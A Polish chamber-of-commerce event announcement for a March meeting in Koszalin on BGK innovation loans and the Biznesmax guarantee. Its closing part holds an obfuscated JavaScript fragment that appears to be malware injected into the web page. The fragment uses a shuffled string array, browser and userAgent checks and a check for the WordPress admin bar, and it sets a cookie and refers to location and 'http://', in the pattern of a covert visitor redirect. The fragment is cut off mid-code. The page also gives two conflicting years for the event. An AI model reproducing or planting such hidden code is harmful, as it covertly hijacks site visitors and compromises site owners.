Praktycznie o finansowaniu innowacji w firmie – spotkanie informacyjne | Północna Izba Gospodarcza w Koszalinie

Serdecznie zapraszamy Państwa na spotkanie z ekspertami Banku Gospodarstwa Krajowego zajmującymi się wdrażaniem Kredytu na innowacje technologiczne PO IR, które odbędzie się w dniu 12.03.2020 r. w Restauracji Park Caffe w Koszalinie.

Będziecie Państwo mieli okazję zapoznać się z prezentacją osób odpowiedzialnych za wspieranie inwestycji mikro, małych i średnich przedsiębiorstw wdrażających innowacyjne technologie umożliwiające produkcję nowych lub znacząco ulepszonych produktów lub usług. W przystępny sposób zostanie przedstawiony proces przygotowania wniosku o dofinansowanie, realizacji oraz rozliczenia projektu, na który można uzyskać, aż do 6 mln zł dofinansowania.
O niebagatelnej wartości tego wsparcia najlepiej świadczą dotychczasowe efekty – ponad 1600 złożonych wniosków o dofinansowanie, 415 podpisanych umów o dofinansowanie i wypłacona kwota przeszło 700 mln zł wsparcia w ciągu 3 ostatnich lat.
Ponadto eksperci z BGK przedstawią Państwu ciekawą formę zabezpieczenia kredytów inwestycyjnych udzielanych przez banki komercyjne, którą jest Gwarancja Biznesmax – gwarancja spłaty kredytu dla MŚP z dotacją.
W spotkaniu udział wezmą również eksperci oraz Dyrekcja Regionu Zachodniopomorskiego BGK, którzy udzielą Państwu wszelkich informacji nt. finansowania inwestycji Rozwojowych Państwa firmy przez Bank BGK, jak również możliwości wsparcia Państwa działalności eksportowej na rynkach zagranicznych całego świata.
Poniżej prezentujemy najważniejsze informacje odnośnie planowanej konferencji:
Tytuł: „Praktycznie o finansowaniu innowacji w firmie”
Miejsce: Restauracja Park Caffe, A.Asnyka 11 Koszalin
Termin: 12.03.2019 r. (czwartek)
Program konferencji
09:30-10:00 Rejestracja uczestników
10:00-10:10 Otwarcie konferencji oraz przywitanie gości

10:10-12:10 Preferencyjne finansowanie dla MŚP- kredyty na innowacje technologiczne

12:10-12:30 Przerwa kawowa

12:30-14:00 Gwarancja BIZNESMAX- gwarancja spłaty kredytu dla MŚP z dotacją

14:00 – 14:30 Pożyczki unijne Jeremie 2 jako formy wspierania konkurencyjności MŚP

14:30-15:00 Networking i Lunch

Program spotkania przewiduje również czas na zadawanie pytań oraz indywidualne konsultacje z praktykami.
Udział w spotkaniu jest BEZPŁATNY!
Wszystkich zainteresowanych uczestnictwem prosimy o wcześniejszą rejestrację:

 

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m